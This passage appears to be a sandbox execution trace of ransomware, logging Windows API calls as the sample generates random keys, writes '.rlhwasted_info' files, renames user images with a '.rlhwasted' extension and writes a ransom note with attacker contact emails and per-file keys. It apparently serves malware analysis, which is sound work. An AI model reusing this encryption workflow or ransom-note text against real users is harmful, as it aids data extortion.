RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0195.914] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0195.961] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.961] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JUxVhd6nxdJeCm9pQpO5ZbGvGLfMZwaakNg1koDDZeseGv4Q8hKhnIuNBZISXJFd\r\n3vu2ZimhhwwdGL7PYzZMmTVebm0LM6jPJUx8uzSwNY6t9eW+b3zDr1YBSHwkkSsN\r\nrc5oWllPEi8bfAFxCLM3T83AONFAJFvD9VVVyCjBssklzGvxC16+NuDM7r9zZ3SE\r\nzS9jTjSb5lj/DlRGTiaBR9RIEM2bFLESYAiRAsY3Lv6loTpo7PVpY2naV68Sb1Si\r\nWAQZIX9BwQFuO8IGS8Gce9qHCXoDXzDGn3Wj1uFzHhOabq3jDKsqsc0V/HUyYT+E\r\n1AQCWHwaQhxP1MCjYfIvMfP9S6Rk9ZrX+PQv7algP+pTfu0pTNe+cbIj/ufweglN\r\nl7tvDngoZVTFH8YSPDMahBjbXJI9HI4E9mTmZcgryep5+tqUA0JFm4x6Gz4Ut3To\r\nsTTnMFvyz98QOsHLNb3Ji+0jVV2wlyI5Dqu2Thj6OHfX3+8FU+gl3f3oQK7c+NfQ\r\ntTemU4pAobe2kCp/d8qf/UCWAuuzLR1u/kLUmiNnViu+zYb+2G3l/OCu4zzMQmH0\r\n4mjM3pQmSQ2kohAIYyMec6ZXvD06Cis7OyvkX5pJBLTAsJs5z45S58UXPZoEsPaR\r\nQcTTFFeigdwYFU7N3shq3ode3Jkrc9LEyfnbSgW7dP+=[end_key]\r\nKEEP IT\r\n") returned 981 [0195.961] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.961] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0195.961] SetEndOfFile (hFile=0x104) returned 1 [0195.964] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.964] CloseHandle (hObject=0x104) returned 1 [0195.966] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0195.967] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8078 | out: hHeap=0x6b0000) returned 1 [0195.967] _aulldvrm () returned 0x0 [0195.967] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f98) returned 1 [0195.968] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.968] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.968] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\hWdtuc.bmp") returned 68 [0195.968] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x292) returned 0x6d4580 [0195.968] lstrcpyW (in: lpString1=0x6d4608, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.968] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.968] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f98) returned 1 [0195.969] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0195.969] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\hWdtuc.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\hwdtuc.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.970] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.971] SetEndOfFile (hFile=0x104) returned 1 [0195.972] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.972] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.972] lstrcpyW (in: lpString1=0x6d4608, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\hWdtuc.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\hwdtuc.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\hWdtuc.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\hwdtuc.bmp.rlhwasted")) returned 1 [0195.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\hWdtuc.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\hwdtuc.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0195.973] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0195.973] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xc472 [0195.973] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc472) returned 0x6a0000 [0195.974] CloseHandle (hObject=0x108) returned 1 [0195.977] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0195.978] CloseHandle (hObject=0x10c) returned 1 [0195.978] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e8978 [0195.978] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f98) returned 1 [0195.979] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x6e89c0 | out: pbBuffer=0x6e89c0) returned 1 [0195.979] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.979] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f98) returned 1 [0195.980] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.980] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.990] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0195.991] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0195.991] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.991] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jGDAlgPD8i9D0oRjxuO2+EwTzQSdgSM6jixghl1Q+h72qR8lXnjyxGeF1Eo47V3R\r\nv/OxqPjH8FQtGdQnNdn0qZRubRWbDFc6kM8VWGBCCluEKnWB52RHdcwM+6RS9Arx\r\nnJYcJIQVDFtIQ+YOGeRpuQSwJ5GHy16QBV1koxj+YqojPP6Fq9MiL1x8Wo5A/RyY\r\nP1/GGl6toBY2gguw0BurpC4ALOiWxxN2xR3HcAJzRcg8cKgh4T49EI9Qcx9R31xJ\r\nUNQl/K8/oP7qzRW3lAvDdlmeXTypXHMLe12H7i87TFFUoe2lIzMPYCV+PvJyp3WW\r\nxwXf+yS9HQWKtbK3agsHbZL/lCr8nCsKVVM9dUvf+5xhLVIdo363HtevWfdnjvua\r\nG5cN9+wqt92g9mdHbFK1HQ7G8gLk46O5GiOY8eF8BTKs2FPPNBLEwxMKcSyM9hZD\r\nUC8bX7rwP1BijsQY/RVL9IiCaEOm+PAVkfomd1DEqmgzXxw/PGiinGEb3SxScQ8W\r\n/k6Dsy0wqEcKbTJ2O4Aoi9Q5nOi758rERxVtrW9IIQjtwOq5ppVX2489u54f8x9c\r\nbqXbdqfVeo22nSnrEtufVVZuxiBjLVP9JJFJCWN1m9Cj+zpDuEsei0fhHk3ozjkM\r\n1RiNlEe0k9x5rY6ONi0yHbt+vt3LsCruB50unV0eIKk=[end_key]\r\nKEEP IT\r\n") returned 981 [0195.991] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.991] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0195.991] SetEndOfFile (hFile=0x104) returned 1 [0196.041] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.041] CloseHandle (hObject=0x104) returned 1 [0196.048] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.049] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8160 | out: hHeap=0x6b0000) returned 1 [0196.049] _aulldvrm () returned 0x0 [0196.049] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.050] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.050] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\x8pdI_Sn8.gif") returned 92 [0196.050] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c2) returned 0x6e7f18 [0196.050] lstrcpyW (in: lpString1=0x6e7fd0, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.050] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.050] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0196.051] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.051] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\x8pdI_Sn8.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\x8pdi_sn8.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.052] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.064] SetEndOfFile (hFile=0x104) returned 1 [0196.064] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.065] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.065] lstrcpyW (in: lpString1=0x6e7fd0, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\x8pdI_Sn8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\x8pdi_sn8.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\x8pdI_Sn8.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\x8pdi_sn8.gif.rlhwasted")) returned 1 [0196.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\x8pdI_Sn8.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\x8pdi_sn8.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.066] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0196.066] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xccf [0196.066] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xccf) returned 0x6a0000 [0196.067] CloseHandle (hObject=0x128) returned 1 [0196.069] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.069] CloseHandle (hObject=0x12c) returned 1 [0196.069] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.069] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.071] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.071] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.071] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.072] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.072] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.083] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.083] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.083] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.083] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gUR4UocK+lzXHkVGFcyDdvwCEOCIvKg1rvd/Div2gwsMPHd47zVWZt/pyLPYcCvW\r\nY4MRF2Rqbb+fW3EOH7m8PDfp/5N+Y77IxY0HCjGJcnTXwId6/dwtzVODPgwOv5Cs\r\nc0+qDPMh5j2hsoMmI0Wr+VXbkfuXKsFMqpOilUX+C7nQ0bjHAaPPSexonvK2RRFt\r\nyoKqSHusaKmtx+MpcbaxeXNji6VR2KZ1NLVE8/HyLtYLJaEH6jT+fmYlJlmVoV1B\r\nD96l8BfDJsmMx4MSOAp5hNSmSBE0Xak2nW9ykDYimzZG5C5jKn3yut/bjh2O31UE\r\n1tlGvxXQWJ0E7cuSlAvHkmEdSG4rKMXoo+ASNc3oEOfo6Z5BP+C8sLQCoVRgkhr6\r\nabrXuZnh8U6OkvzhsbAJFYf0Mj//o/FyvLiKaKl5ugdDCJEUm5qCKS9yTZDRhMXF\r\nzQMcG0/hoZnZpHYLNoBYJ+QVOxCb2ZBj1VpE3V9jQ8D7KywQg8xRDFpp92O+SPml\r\n8Wzh2KlREQ6lhwC5l6z6xFU12On2BUvko7dAyfWGUqWcWjfA9TfWn+jiKUC8YUz4\r\n9bGT9bxYX4RgyzHxIBkqRie6yUx0nZgG8cJKv+R4I/qIjIoF5SVDpQl+wVGromiK\r\nFNrsmRFkhFvNz2AXT5sh81DCqHgx46AYGKXFPHgalic=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.083] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.083] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.083] SetEndOfFile (hFile=0x104) returned 1 [0196.133] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.133] CloseHandle (hObject=0x104) returned 1 [0196.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f18 | out: hHeap=0x6b0000) returned 1 [0196.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e85b0 | out: hHeap=0x6b0000) returned 1 [0196.136] _aulldvrm () returned 0x0 [0196.136] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.137] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.137] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\TvKdrMIz.jpg") returned 70 [0196.137] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x296) returned 0x6e7f18 [0196.137] lstrcpyW (in: lpString1=0x6e7fa4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.137] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.137] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0196.138] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.138] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\TvKdrMIz.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\tvkdrmiz.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.139] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.140] SetEndOfFile (hFile=0x104) returned 1 [0196.140] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.140] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.140] lstrcpyW (in: lpString1=0x6e7fa4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\TvKdrMIz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\tvkdrmiz.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\TvKdrMIz.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\tvkdrmiz.jpg.rlhwasted")) returned 1 [0196.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\TvKdrMIz.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\tvkdrmiz.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.142] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0196.142] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x17ed8 [0196.142] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17ed8) returned 0xb00000 [0196.143] CloseHandle (hObject=0x128) returned 1 [0196.151] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.152] CloseHandle (hObject=0x10c) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.152] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.153] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.153] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.153] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.154] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.154] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.164] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.164] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 